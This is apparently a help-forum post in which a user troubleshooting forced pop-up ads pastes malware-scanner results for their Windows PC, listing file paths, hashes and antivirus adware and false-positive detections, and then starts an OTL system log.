File path: c:\users\ryota\appdata\local\comodo\dragon\user data\default\extensions\mihcahmgecmbnbcchbopgniflfhgnkff\127\manifest.json
Publisher:
MD5: 0d1242f2beff2a586e2da1ae64a85576
SHA-1: cdc4b635c3842fbd9716d699abe4acd00a2ed26c
Created: 2013/01/12 15:34:18
Detections: 1
Determination: Adware
- Reason Heuristics as PUP.Chrome.Extension.MailChecker (Adware)

---------------------------------------------------------------------------------

File path: c:\users\ryota\appdata\local\comodo\dragon\user data\default\extensions\pjcajdjkhacidelppkfpjobgdjkafjaa\1.1\manifest.json
Publisher:
MD5: 7c800d4e4dae3ef3f65dee4960957746
SHA-1: 67fe3b17009cf66cd3b6b100e419caa78aac789d
Created: 2014/01/12 15:34:15
Detections: 1
Determination: Adware
- Reason Heuristics as Adware.Obscure.WebPick.ChromePlugin (Adware)

---------------------------------------------------------------------------------

File path: c:\users\ryota\appdata\local\google\chrome sxs\user data\default\extensions\eekmagkgglabkmaoecjndeboolfapocg\1.0\manifest.json
Publisher:
MD5: e2832fbedae560495781610b5c511afa
SHA-1: 95f9c6fe1ea5a6ee009bce1e9c215ef53fb5c108
Created: 2013/01/12 15:34:11
Detections: 1
Determination: Adware
- Reason Heuristics as PUP.WebPick.YoutubeAdblocker.ChromePlugin.M (Adware)

---------------------------------------------------------------------------------

File path: c:\users\ryota\appdata\local\google\chrome sxs\user data\default\extensions\lfnkbkehickiiakkkdkhfaifpdkaobim\2.7\manifest.json
Publisher:
MD5: 2df44604a8b618be96a265130308516c
SHA-1: 8df8b294612d3e16cc381e101c5b9e35d5fa5013
Created: 2014/01/12 15:33:53
Detections: 1
Determination: Adware
- Reason Heuristics as PUP.JustPlugIt.M (Adware)

---------------------------------------------------------------------------------

File path: c:\users\ryota\appdata\local\google\chrome sxs\user data\default\extensions\mihcahmgecmbnbcchbopgniflfhgnkff\127\manifest.json
Publisher:
MD5: 0d1242f2beff2a586e2da1ae64a85576
SHA-1: cdc4b635c3842fbd9716d699abe4acd00a2ed26c
Created: 2014/01/12 15:34:18
Detections: 1
Determination: Adware
- Reason Heuristics as PUP.Chrome.Extension.MailChecker (Adware)

---------------------------------------------------------------------------------

File path: c:\users\ryota\appdata\local\google\chrome sxs\user data\default\extensions\pjcajdjkhacidelppkfpjobgdjkafjaa\1.1\manifest.json
Publisher:
MD5: 7c800d4e4dae3ef3f65dee4960957746
SHA-1: 67fe3b17009cf66cd3b6b100e419caa78aac789d
Created: 2014/01/12 15:34:15
Detections: 1
Determination: Adware
- Reason Heuristics as Adware.Obscure.WebPick.ChromePlugin (Adware)

---------------------------------------------------------------------------------

File path: c:\users\ryota\appdata\roaming\microsoft\installer\{45a66726-69bc-466b-a7a4-12fcba4883d7}\hijackthis.exe
Publisher: Trend Micro Inc.
MD5: 29c81875332f7084321c3a82a9a7bf9f
SHA-1: 52c7a761d6c08f951f250ab6ee9bf67813e1112a
Created: 2013/08/24 1:23:34
Detections: 1
Determination: Ignore detections (false positive)
- Rising Antivirus as PE:Trojan.VBInject!1.6546 (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\appdata\roaming\mozilla\firefox\profiles\huvep8mo.default\extensions\hgplugin@hangame.co.jp\plugins\hgstart.exe
Publisher: NHN Japan Corp.
Signer: NHN Japan Corporation
MD5: fe20398a13dd7aeeaf285fbcc79424c6
SHA-1: aac5d88c0087fc443e7ac73c29456cfe66a94de0
Created: 2014/06/30 1:40:55
Detections: 1
Determination: Inconclusive
- Norman as W32/Downloader (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\appdata\roaming\xlgames\xlkcsdownload_jp\xlkcsdownload_jp.exe
Publisher: Kamuse, Incorporated
Signer: Kamuse Co.,Ltd
MD5: 590cc4923dfdfbe33ae7f901b599ceb2
SHA-1: 398c7918b775b2af424e28f5f42b5e7d73376392
Created: 2014/08/10 22:43:24
Detections: 3
Determination: Ignore detections (false positive)
- Trend Micro House Call as TROJ_GEN.F47V0322 (Undefined)
- Comodo Security as Heur.Suspicious
- Dr.Web as DLOADER.Trojan (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files\limechat2\uninst.exe
Publisher:
MD5: d3100b9ab07ed6364a82f74d1630f467
SHA-1: 3d590bdbc070419bd1c1cc627295eb5a133f1cba
Created: 2014/04/27 3:25:23
Detections: 1
Determination: Ignore detections (false positive)
- SUPERAntiSpyware as PUP.Downloader (Adware)

---------------------------------------------------------------------------------
  • かなは
  • 2015/04/21 (Tue) 17:03:57
Re: I'm having trouble with pop-ups and ads being forcibly displayed.
HP log 3


File path: c:\program files\reference assemblies\microsoft\framework\v3.0\presentationframework.dll
Publisher: Microsoft Corporation
MD5: 4b737f8e182e591e296439a2bf7a7b1b
SHA-1: dd382910093f44d85b289f63422479cadf777efe
Created: 2014/11/13 20:26:21
Detections: 1
Determination: Inconclusive
- Avira AntiVirus as W32/Sality.AT (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files\utvideo\utv_cfg.exe
Publisher:
MD5: 62cb1798f5db762f0195a4a213646a07
SHA-1: c7fadc7f32ab6fefe229c146a247feb89f373001
Created: 2013/10/28 17:28:08
Detections: 2
Determination: Inconclusive
- nProtect as Trojan/W32.Agent.49152.ANL (Undefined)
- AhnLab V3 Security as Win-Trojan/Shutdowner.126976 (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files\via\viaaud\viaaud.exe
Publisher: VIA
Signer: VIA Technologies Inc.
MD5: 2fadb479c5d257665052dc1422ae9ddf
SHA-1: 4293aaa0538bbb0b6c1160f98df98a6e9bfe8c30
Created: 2012/10/30 16:18:32
Detections: 1
Determination: Ignore detections (false positive)
- ByteHero BDV as Trojan.Malware.Win32.xPack.i (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\capcom\monster hunter frontier online\mhf.exe
Publisher:
MD5: 559575b576095ac53657a4ba77a943c4
SHA-1: aed4ef935eb54c7864f2ae225f0da908cbdebbf1
Created: 2014/08/21 4:39:32
Detections: 2
Determination: Ignore detections (false positive)
- Quick Heal as (Suspicious) - DNAScan
- ByteHero BDV as Virus.Win32.Heur.l

---------------------------------------------------------------------------------

File path: c:\program files (x86)\creative\プロダクト レジストレーション\japanese\inetreg.exe
Publisher: Creative Technology Ltd
Signer: Creative Technology Ltd
MD5: 71386e71d8ea3304b384097f9741ec0a
SHA-1: 478a50d94d78496222a098053a31e1f19efa4007
Created: 2012/10/31 18:21:39
Detections: 1
Determination: Ignore detections (false positive)
- nProtect as Trojan-Downloader/W32.Andromeda.755312 (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\daemon tools lite\dthelper.exe
Publisher: Disc Soft Ltd
Signer: Disc Soft Ltd
MD5: 7bd824285ba0c820ef0eadb19528afd8
SHA-1: 0c14a9296bf1d497c6510055945680a757173e9d
Created: 2014/03/04 18:19:20
Detections: 1
Determination: Ignore detections (false positive)
- McAfee Web Gateway as Heuristic.BehavesLike.Win32.Suspicious-BAY.K

---------------------------------------------------------------------------------

File path: c:\program files (x86)\ffdshow\ffmpeg.dll
Publisher:
MD5: 044a62845e948918c5f4e35c63b77b14
SHA-1: 9e4049ace89ce38639ccf009152c2a65a0b5df8a
Created: 2014/02/15 0:25:24
Detections: 1
Determination: Ignore detections (false positive)
- Bkav FE as W32.HfsAutoA (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\ffdshow\ff_liba52.dll
Publisher:
MD5: b116fad39e0ccab620ab459ae591a507
SHA-1: 6e079200bc552be47043cb7bf485ceeb40b00457
Created: 2014/02/15 0:25:24
Detections: 1
Determination: Ignore detections (false positive)
- ByteHero BDV as Trojan.Malware.Win32.xPack.i (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\ffdshow\ff_libdts.dll
Publisher:
MD5: 6111e47cc6a86055f793363bfd0e9219
SHA-1: 2f30e4172ae704299b76be6faf7d4de7c10b92fb
Created: 2014/02/15 0:25:24
Detections: 1
Determination: Ignore detections (false positive)
- ByteHero BDV as Trojan.Malware.Win32.xPack.i (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\ffdshow\ff_libmad.dll
Publisher:
MD5: 55e7b5f21b7108e8371b6d1efde85eb2
SHA-1: d23a32e6836a0741ba1a2fa147d8ce281005b48a
Created: 2014/02/15 0:25:24
Detections: 1
Determination: Ignore detections (false positive)
- ByteHero BDV as Trojan.Malware.Win32.xPack.i (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\ffdshow\libmpeg2_ff.dll
Publisher:
MD5: 30c891e093ec150ea74984386d320727
SHA-1: 74052846b3f9e71b353a80f565d5c9350df73c51
Created: 2014/02/15 0:25:24
Detections: 1
Determination: Ignore detections (false positive)
- ByteHero BDV as Trojan.Malware.Win32.xPack.i (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\ffdshow\tomsmocomp_ff.dll
Publisher:
MD5: 140ca094c599b172caecf2bc4ea51d03
SHA-1: 2b769c8fe3637f872bf375f277b48a7ae278d948
Created: 2014/02/15 0:25:24
Detections: 1
Determination: Ignore detections (false positive)
- ByteHero BDV as Trojan.Malware.Win32.xPack.i (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\installshield installation information\{33f7a957-a66d-45a1-badf-6576083b14e2}\setup.exe
Publisher: InstallShield Software Corporation
MD5: a81fb6afcc0503ebd21915f128d1836d
SHA-1: f8b5759afa5cb055c8d5ffce2718722671da0c20
Created: 2013/10/28 16:33:36
Detections: 1
Determination: Ignore detections (false positive)
- The Hacker as Trojan/KillAV.nhz (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\k-opticom\eo\app\pingdns.dll
Publisher: Efficient Networks
Signer: Siemens Subscriber Networks LLC
MD5: 11b7b1c7806582e97cba88284fdaa782
SHA-1: 7cd908bf3c7d668a1248736fbdb987e5fe6a8311
Created: 2012/10/31 16:44:37
Detections: 1
Determination: Ignore detections (false positive)
- Prevx as Heuristic: Suspicious File With Mass Email Capabilities

---------------------------------------------------------------------------------

File path: c:\program files (x86)\k-opticom\eo\app\tangomanager.exe
Publisher: Efficient Networks Inc.
Signer: Siemens Subscriber Networks LLC
MD5: dda5c03f2ceebeff1eda761e746c41ac
SHA-1: 86b92e1b6f8b91611c200ff5ed8896921f44350f
Created: 2012/10/31 16:44:38
Detections: 1
Determination: Ignore detections (false positive)
- Prevx as Heuristic: Suspicious Hijacker (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\k-opticom\eo\app\tap.exe
Publisher:
Signer: Siemens Subscriber Networks LLC
MD5: 55f097d878319d374ca2dc778b4b08dd
SHA-1: b6228d09affa8b78564af5bd9cfb52129b813032
Created: 2012/10/31 16:44:38
Detections: 1
Determination: Ignore detections (false positive)
- Sunbelt AntiMalware as Trojan-Spy.Win32.Banker.E (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\microsoft games\age of empires ii\ebueula.dll
Publisher: Microsoft Corporation
MD5: d1cfcad7f3ad257beccbf248e043703a
SHA-1: d1a512c7a747949af1932ed5a5486128f0a10478
Created: 1999/09/03 3:41:58
Detections: 1
Determination: Ignore detections (false positive)
- NANO AntiVirus as Trojan.Win32.Obfuscate.crokuk (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\microsoft games\age of empires ii\emod.dll
Publisher:
MD5: 70e8ed1125538b5d74bf5407c6206ea4
SHA-1: 20f78e3a79317c07ce278eb9083671c9c2f1b1ec
Created: 2012/12/17 16:26:21
Detections: 1
Determination: Ignore detections (false positive)
- Bkav FE as W32.JinofineN.Trojan (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\microsoft games\age of empires ii\empires2.exe
Publisher: Microsoft Corporation
MD5: bc1a30f5a8a4828d80e9bced9c2a3caa
SHA-1: 0b4850ec610affe88c02b7a546e45b0b87067f2f
Created: 2000/07/29 6:33:14
Detections: 1
Determination: Ignore detections (false positive)
- Kingsoft AntiVirus as Win32.Malware.Generic.a.(kcloud) (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\microsoft games\age of empires ii\ha312w32.dll
Publisher: MicroQuill Software Publishing, Inc.
MD5: ba83d7c4a9750d0edb7accaf17c49b09
SHA-1: decb10c809ccd9b47d135dd50384a4c094388695
Created: 1998/09/28 20:01:00
Detections: 1
Determination: Ignore detections (false positive)
- Bkav FE as W32.HfsAutoB (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\microsoft games\age of empires ii\uninstal.exe
Publisher: Microsoft Corporation
MD5: 9ee3ab2b115d5762c6c7c194f2e1f595
SHA-1: 65548c4f02ba4ed51e8e2ae5f2154edfdef96839
Created: 2000/09/28 4:17:58
Detections: 1
Determination: Ignore detections (false positive)
- ByteHero BDV as Virus.Win32.Part.a (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\microsoft games\age of empires ii\wndmode.dll
Publisher:
MD5: 826ffb925e963318e72bfad04dc0835a
SHA-1: 445be1136297bf5ae1d0c03d43fb419e6a2bcf30
Created: 2012/12/17 16:26:20
Detections: 1
Determination: Ignore detections (false positive)
- ViRobot as Trojan.Win32.A.Downloader.276992.T (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\microsoft games\age of empires ii\data\closedpw.exe
Publisher:
MD5: 6295c1c28ab5bbba657d448308830dfd
SHA-1: c403e034343a1aebc1909c305177465c6dfbada0
Created: 1997/09/10 12:44:40
Detections: 2
Determination: Ignore detections (false positive)
- K7 Gateway Antivirus as Trojan (Undefined)
- ViRobot as Trojan.Win32.PSWIGames.49152.BM (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\navel\俺たちに翼はないr\uninst.exe
Publisher:
MD5: 1548d04ea38626a54c053612c42f6c00
SHA-1: 434fba20c40c1dba7b36d3f745a76dc79f0ac932
Created: 2014/11/20 14:38:04
Detections: 1
Determination: Ignore detections (false positive)
- Bkav FE as HW32.Pedka (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\niwango\nicoliveenc\xsplitgamesource.dll
Publisher: SplitmediaLabs Limited
MD5: a0c098e4c96c18a092a5b1df3ecac8e9
SHA-1: 95bc6ced5fc864bbc387e8089aca8a217de46f4c
Created: 2013/04/18 21:36:17
Detections: 1
Determination: Ignore detections (false positive)
- ByteHero BDV as Trojan.Malware.Win32.xPack.i (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\project64 2.1\plugin\1.6 plugins\jabo_dinput.dll
Publisher: Project64
MD5: d5f798c360aaac128b0fc4a211688ccd
SHA-1: 4b55d92fda42f108bd0e22503afd905754e95caf
Created: 2014/11/13 22:03:21
Detections: 1
Determination: Ignore detections (false positive)
- Agnitum Outpost as RiskWare.PEMalform (Adware)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\project64 2.1\plugin\1.6 plugins\jabo_direct3d8.dll
Publisher: Project64
MD5: ff57f60c58ede6364b980edcb311873b
SHA-1: 5ec6e231f780d9eafa6ee855e0f4968a7f8c347d
Created: 2014/11/13 22:03:21
Detections: 1
Determination: Ignore detections (false positive)
- Agnitum Outpost as RiskWare.PEMalform (Adware)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\project64 2.1\plugin\1.6 plugins\nrage_dinput8_v2.dll
Publisher: Gbs
MD5: f5296ecc4d6ea5605291de9203032a82
SHA-1: 8e72558a56adb82f3ed939c39f67718a0068400e
Created: 2014/11/13 22:03:21
Detections: 1
Determination: Ignore detections (false positive)
- Antiy Labs AVL as Packed/Win32.Klone.gen (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\quicktime\qtsystem\quicktimeupdatehelper.exe
Publisher: Apple Inc.
MD5: 6ba0a1e9e362d1df46bf747ba0f942fa
SHA-1: e39ffa0bdd613caa6e84df3cb4dd5dae6f2a2b3d
Created: 2014/01/17 16:24:00
Detections: 1
Determination: Ignore detections (false positive)
- Boost by Reason as Optional.Apple.V

---------------------------------------------------------------------------------

File path: c:\program files (x86)\segmentamplifier\segmentamplifier.dll
Publisher:
MD5: 1088823f5995b8bda197b6dfa0b40818
SHA-1: ed7c8a42748049f2c9932bd95cf502a6ce99eb6d
Created: 2015/02/25 17:41:13
Detections: 20
Determination: Adware
- Bkav FE as HW32.Packed (Undefined)
- MicroWorld eScan as Gen:Variant.Adware.Zusy.122341 (Adware)
- F-Prot as W32/S-f055c78a (Undefined)
- Trend Micro House Call as TROJ_GEN.R08NH09BB15 (Undefined)
- Bitdefender as Gen:Variant.Adware.Zusy.122341 (Adware)
- Lavasoft Ad-Aware as Gen:Variant.Adware.Zusy.122341 (Adware)
- Emsisoft Anti-Malware as Gen:Variant.Adware.Zusy.122341 (Adware)
- F-Secure as Gen:Variant.Adware.Zusy.122341 (Adware)
- McAfee Web Gateway as BehavesLike.Win32.AdwareBDSearch.tc (Adware)
- Sophos as Generic PUA ON (Undefined)
- Avira AntiVirus as ADWARE/MultiPlug.Gen4 (Adware)
- G Data as Gen:Variant.Adware.Zusy.122341 (Adware)
- AhnLab V3 Security as PUP/Win32.MultiPlug (Adware)
- McAfee as Artemis!1088823F5995 (Undefined)
- Baidu Antivirus as PUA.Win32.SProtector (Adware)
- ESET NOD32 as Win32/SProtector.O potentially unwanted (variant) (Adware)
- IKARUS anti.virus as PUA.SProtector (Adware)
- Panda Antivirus as Trj/Genetic.gen (Undefined)
- Qihoo 360 Security as Win32/Virus.Adware.f45 (Adware)
- Reason Heuristics as Threat.Win.Reputation.IMP (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\tk3\tk3.exe
Publisher: INTERHEART CO., LTD.
MD5: 9a895c4dd01bbeae4ff651c1516a8a55
SHA-1: 0c7be3beb5c00f66444d40cafe0cdd15e0ca9063
Created: 2011/03/08 1:00:00
Detections: 1
Determination: Ignore detections (false positive)
- ByteHero BDV as Trojan.Malware.Win32.xPack.i (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\trend micro\hijackthis\hijackthis.exe
Publisher: Trend Micro Inc.
MD5: 29c81875332f7084321c3a82a9a7bf9f
SHA-1: 52c7a761d6c08f951f250ab6ee9bf67813e1112a
Created: 2010/03/25 18:42:36
Detections: 1
Determination: Ignore detections (false positive)
- Rising Antivirus as PE:Trojan.VBInject!1.6546 (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\trend micro\hijackthis\backups\backup-20150404-173048-813.dll
Publisher:
MD5: aafedd814bba50c1bf3f9a61799f63f4
SHA-1: c4bff3c9e6b4ef530c21a9e16f8954ac916b5e46
Created: 2015/03/06 9:10:08
Detections: 37
Determination: Adware
- Bkav FE as W32.GueteycosLTR.Trojan (Undefined)
- MicroWorld eScan as Gen:Variant.Adware.Zusy.121779 (Adware)
- Malwarebytes as PUP.Optional.Multiplug.A (Adware)
- Zillya! Antivirus as Adware.MultiPlug.Win32.230694 (Adware)
- SUPERAntiSpyware as Adware.MultiPlug/Variant (Adware)
- K7 Gateway Antivirus as Adware (Adware)
- K7 AntiVirus as Adware (Adware)
- NANO AntiVirus as Trojan.Win32.XPACK.doyjfa (Undefined)
- F-Prot as W32/S-6ad1b408 (Undefined)
- Trend Micro House Call as TROJ_GEN.R02KC0ECC15 (Undefined)
- avast! as Win32:PUP-gen [PUP] (Adware)
- Bitdefender as Gen:Variant.Adware.Zusy.121779 (Adware)
- Agnitum Outpost as PUA.MultiPlug (Adware)
- Lavasoft Ad-Aware as Gen:Variant.Adware.Zusy.121779 (Adware)
- Emsisoft Anti-Malware as Gen:Variant.Adware.Zusy.121779 (Adware)
- Comodo Security as Application.Win32.AdWare.MultiPlug.VB (Adware)
- F-Secure as Gen:Variant.Adware.Zusy (Adware)
- Dr.Web as Trojan.Crossrider1.21906 (Adware)
- VIPRE Antivirus as Trojan.Win32.Generic (Undefined)
- Trend Micro as TROJ_GEN.R02KC0ECC15 (Undefined)
- McAfee Web Gateway as Multiplug-FNZ (Undefined)
- Sophos as MultiPlug (Undefined)
- Jiangmin as Adware/Agent.aksh (Adware)
- Avira AntiVirus as TR/Crypt.XPACK.Gen7
- Antiy Labs AVL as Trojan/Win32.TSGeneric (Undefined)
- G Data as Gen:Variant.Adware.Zusy.121779 (Adware)
- AhnLab V3 Security as Adware/Win32.Agent (Adware)
- McAfee as Multiplug-FNZ (Undefined)
- Vba32 AntiVirus as AdWare.Agent (Adware)
- Baidu Antivirus as Adware.Win32.MultiPlug (Adware)
- ESET NOD32 as Win32/Adware.MultiPlug.FL (variant) (Adware)
- Rising Antivirus as PE:Adware.Zusy!6.1F0B (Adware)
- Fortinet FortiGate as Riskware/MultiPlug (Undefined)
- AVG as Generic6 (Undefined)
- Panda Antivirus as Trj/Genetic.gen (Undefined)
- Qihoo 360 Security as Win32/Trojan.cb1 (Undefined)
- Reason Heuristics as Threat.Win.Reputation.IMP (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\trend micro\hijackthis\backups\backup-20150404-191940-416.dll
Publisher:
MD5: 8fabf78be053de024e9c6bb1d87e5032
SHA-1: 3ac44421b2732f075f0c697414d16fca1d2fb575
Created: 2015/03/24 16:16:35
Detections: 29
Determination: Adware
- MicroWorld eScan as Gen:Variant.Adware.Zusy.121779 (Adware)
- McAfee as MultiPlug-FNZ (Undefined)
- Malwarebytes as PUP.Optional.Multiplug.A (Adware)
- Agnitum Outpost as Trojan.Agent (Undefined)
- F-Prot as W32/S-df2a10d9 (Undefined)
- Trend Micro House Call as TROJ_GEN.R047C0OCS15 (Undefined)
- avast! as Win32:Adware-gen [Adw] (Adware)
- Kaspersky as HEUR:Trojan.Win32.Generic (Undefined)
- Bitdefender as Gen:Variant.Adware.Zusy.121779 (Adware)
- NANO AntiVirus as Trojan.Win32.Crossrider1.dpmkgj (Adware)
- SUPERAntiSpyware as Adware.MultiPlug/Variant (Adware)
- Lavasoft Ad-Aware as Gen:Variant.Adware.Zusy.121779 (Adware)
- Emsisoft Anti-Malware as Gen:Variant.Adware.Zusy.121779 (Adware)
- Comodo Security as Application.Win32.AdWare.MultiPlug.VB (Adware)
- F-Secure as Gen:Variant.Adware.Zusy (Adware)
- Dr.Web as Trojan.Crossrider1.22889 (Adware)
- VIPRE Antivirus as Trojan.Win32.Generic (Undefined)
- Trend Micro as TROJ_GEN.R047C0OCS15 (Undefined)
- McAfee Web Gateway as MultiPlug-FNZ (Undefined)
- Sophos as MultiPlug (Undefined)
- ESET NOD32 as Win32/Adware.MultiPlug.FL (variant) (Adware)
- Antiy Labs AVL as Trojan/Win32.TSGeneric (Undefined)
- AhnLab V3 Security as Adware/Win32.Agent (Adware)
- G Data as Gen:Variant.Adware.Zusy.121779 (Adware)
- Baidu Antivirus as Adware.Win32.MultiPlug (Adware)
- Fortinet FortiGate as W32/MultiPlug.FL!tr (Undefined)
- AVG as Generic6 (Undefined)
- Qihoo 360 Security as Win32/Trojan.cb1 (Undefined)
- Reason Heuristics as Threat.Win.Reputation.IMP (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\trend micro\hijackthis\backups\backup-20150404-191940-520.dll
Publisher:
MD5: aafdcae081ecb1e24f261854fe44344b
SHA-1: aef1cb6da3c2dee6b6dd7b6ed001cddb78675183
Created: 2015/03/24 16:16:52
Detections: 35
Determination: Adware
- MicroWorld eScan as Gen:Variant.Adware.Zusy.121779 (Adware)
- McAfee as MultiPlug-FNZ (Undefined)
- Malwarebytes as PUP.Optional.Multiplug.A (Adware)
- Zillya! Antivirus as Adware.MultiPlug.Win32.241156 (Adware)
- SUPERAntiSpyware as Adware.MultiPlug/Variant (Adware)
- K7 Gateway Antivirus as Adware (Adware)
- K7 AntiVirus as Adware (Adware)
- NANO AntiVirus as Trojan.Win32.Crossrider1.dpmkgj (Adware)
- F-Prot as W32/S-df2a10d9 (Undefined)
- Trend Micro House Call as TROJ_GEN.R047C0ECU15 (Undefined)
- avast! as Win32:Adware-gen [Adw] (Adware)
- Kaspersky as HEUR:Trojan.Win32.Generic (Undefined)
- Bitdefender as Gen:Variant.Adware.Zusy.121779 (Adware)
- Agnitum Outpost as Trojan.Agent (Undefined)
- Lavasoft Ad-Aware as Gen:Variant.Adware.Zusy.121779 (Adware)
- Sophos as MultiPlug (Undefined)
- Comodo Security as Application.Win32.AdWare.MultiPlug.VB (Adware)
- F-Secure as Gen:Variant.Adware.Zusy (Adware)
- Dr.Web as Trojan.Crossrider1.22889 (Adware)
- VIPRE Antivirus as Trojan.Win32.Generic (Undefined)
- Trend Micro as TROJ_GEN.R047C0ECU15 (Undefined)
- McAfee Web Gateway as MultiPlug-FNZ (Undefined)
- Emsisoft Anti-Malware as Gen:Variant.Adware.Zusy.121779 (Adware)
- Jiangmin as Adware/Agent.araf (Adware)
- Avira AntiVirus as TR/Crypt.XPACK.Gen7
- Antiy Labs AVL as Trojan/Win32.TSGeneric (Undefined)
- G Data as Gen:Variant.Adware.Zusy.121779 (Adware)
- AhnLab V3 Security as Adware/Win32.Agent (Adware)
- Baidu Antivirus as Adware.Win32.MultiPlug (Adware)
- ESET NOD32 as Win32/Adware.MultiPlug.FL (variant) (Adware)
- Fortinet FortiGate as Riskware/MultiPlug (Undefined)
- AVG as Generic6 (Undefined)
- Panda Antivirus as Trj/Genetic.gen (Undefined)
- Qihoo 360 Security as Win32/Trojan.cb1 (Undefined)
- Reason Heuristics as Threat.Win.Reputation.IMP (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\via\viaudioi\vdeck\viaaud.exe
Publisher: VIA
Signer: VIA Technologies Inc.
MD5: 87ebc6718a3c7a9a744570ac6cc7f459
SHA-1: 6c17b36324043f8c408ade822d1aaf079675c2ef
Created: 2012/10/30 16:18:35
Detections: 1
Determination: Ignore detections (false positive)
- ByteHero BDV as Trojan.Malware.Win32.xPack.i (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\xvid\autoupdate-windows.exe
Publisher: Xvid Team
MD5: b9b5c142c75e7e2a95e7e958cf6eab3a
SHA-1: a88218ec8a6227754fb03acfabe7cca12a11c23a
Created: 2014/02/15 0:25:23
Detections: 1
Determination: Ignore detections (false positive)
- Boost by Reason as Optional.XvidTeam.S

---------------------------------------------------------------------------------

File path: c:\program files (x86)\xvid\checkupdate.exe
Publisher:
MD5: 6d9e1356a9c1b5f36698faff9205e34a
SHA-1: 37433a3bf4ef209b1b159e5f379d26c46ebd6008
Created: 2014/02/15 0:25:23
Detections: 1
Determination: Ignore detections (false positive)
- Boost by Reason as Optional.Startup.L

---------------------------------------------------------------------------------

File path: c:\program files (x86)\xvid\minicalc.exe
Publisher:
MD5: 7ce40a557359849ea374e0e4dde52e26
SHA-1: d865e7ef9c41d8c622ec87577685f3e1868f420e
Created: 2014/02/15 0:25:22
Detections: 1
Determination: Ignore detections (false positive)
- The Hacker as Posible_Worm32 (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\xvid\ogmcalc.exe
Publisher:
MD5: 95caef9da6e9aee1ecd627527cfa0f38
SHA-1: f0ce07a0c7da2f0239ebfe3ca37cd03332d80f0b
Created: 2014/02/15 0:25:22
Detections: 1
Determination: Ignore detections (false positive)
- The Hacker as Posible_Worm32 (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\xvid\statsreader.exe
Publisher:
MD5: 487af46145b81c5bc54873e764f93636
SHA-1: f948b0544c59127e8845eef915f2ec3b6b1c3508
Created: 2014/02/15 0:25:23
Detections: 1
Determination: Ignore detections (false positive)
- The Hacker as Posible_Worm32 (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\xvid\uninstall.exe
Publisher:
MD5: d41d8cd98f00b204e9800998ecf8427e
SHA-1: da39a3ee5e6b4b0d3255bfef95601890afd80709
Created: 2014/02/15 0:25:27
Detections: 11
Determination: Ignore detections (false positive)
- Lavasoft Ad-Aware as Gen:Variant.Zusy.122341 (Undefined)
- ESET NOD32 as Win32/Bundlore.S potentially unwanted application (Adware)
- Avira AntiVirus as TR/ATRAPS.Gen (Undefined)
- Kaspersky as not-a-virus:RiskTool.Win32.SProtector (Adware)
- Dr.Web as Adware.Salus.7, Adware.Salus.5 (Adware)
- Microsoft Security Essentials as Worm:Win32/Yuner.A (Undefined)
- avast! as Malware-gen (Undefined)
- Clam AntiVirus as Win.Trojan.Agent-827002 (Undefined)
- F-Secure as Win32.Sality.OG (Undefined)
- F-Prot as W32/Podnuha.B.gen (Undefined)
- Reason Heuristics as Threat.Win.Reputation.thinkcellSoftwareGmbH (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\xvid\vidccleaner.exe
Publisher:
MD5: 6b5e418a9c02ab0c3f3dd50b0e3cd3a6
SHA-1: d7e976b79de0e822f41845f45c6311d11d2179d0
Created: 2014/02/15 0:25:23
Detections: 1
Determination: Ignore detections (false positive)
- The Hacker as Posible_Worm32 (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\xvid\xvid_encraw.exe
Publisher:
MD5: 6ad766e0133c15132877fe64a50d3ebc
SHA-1: f7abafbf94fa1e64a023fda36edc119ca8e2b631
Created: 2014/02/15 0:25:20
Detections: 3
Determination: Inconclusive
- Trend Micro House Call as TROJ_GEN.F47V0715 (Undefined)
- Antiy Labs AVL as Trojan/Win32.Generic.gen (Undefined)
- Kingsoft AntiVirus as Win32.Troj.Undef.(kcloud) (Undefined)

That's all.
  • かなは
  • 2015/04/21 (Tue) 17:05:07
Re: I'm having trouble with pop-ups and ads being forcibly displayed.
I'll paste the OTL logs below.

OTL log 1

OTL logfile created on: 2015/04/21 1:47:20 - Run 1
OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\ryota\Desktop
64bit- An unknown product (Version = 6.3.9600) - Type = NTWorkstation
Internet Explorer (Version = 9.11.9600.17728)
